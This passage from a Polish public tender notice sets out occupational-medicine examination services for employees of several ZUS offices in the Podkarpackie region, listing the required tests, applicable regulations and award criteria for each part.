e)wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników O/ZUS w Rzeszowie winny być wykonywane w mieście będącym siedzibą Oddziału, tj. w Rzeszowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Jarosławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Inspektoratu ZUS w Jarosławiu.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą. 
Badania profilaktyczne pracowników Inspektoratu ZUS w Jarosławiu winny być wykonywane w mieście będącym siedzibą Inspektoratu, tj. w Jarosławiu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Leżajsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Inspektoratu ZUS w Leżajsku.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Leżajsku winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Leżajsku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Mielcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Inspektoratu ZUS Mielcu.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Mielcu winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Mielcu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Przemyślu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Inspektoratu ZUS Przemyślu.
2.Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Przemyślu winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Przemyślu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Przeworsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników 
Inspektoratu ZUS Przeworsku.
2.Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Przeworsku winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Przeworsku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Stalowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników Inspektoratu ZUS w Stalowej Woli.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Stalowej Woli winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Stalowej Woli.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Inspektoratu ZUS w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników Inspektoratu ZUS w Tarnobrzegu.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania profilaktyczne pracowników Inspektoratu ZUS w Tarnobrzegu winny być wykonywane w mieście będącym siedzibą Inspektoratu tj. w Tarnobrzegu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wykonywanie badań  profilaktycznych (wstępnych, okresowych i kontrolnych) pracowników Biura Terenowego w Lubaczowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest świadczenie usługi profilaktycznej opieki zdrowotnej w zakresie medycyny pracy w tym badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych i badań dla osób z orzeczeniem o niepełnosprawności (na wniosek pracownika) dla pracowników Biura Terenowego w Lubaczowie.
2.	Świadczenie usług medycznych w zakresie medycyny pracy  obejmuje: 
a)	przeprowadzenie profilaktycznych badań wstępnych, okresowych i kontrolnych przewidzianych w Kodeksie Pracy zgodnie ze wskazówkami metodycznymi przeprowadzania badań profilaktycznych pracowników określonymi w Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 ze zm.),
b)	udział lekarzy medycyny pracy Wykonawcy w posiedzeniach komisji BHP Odbiorcy i kontrola warunków pracy,
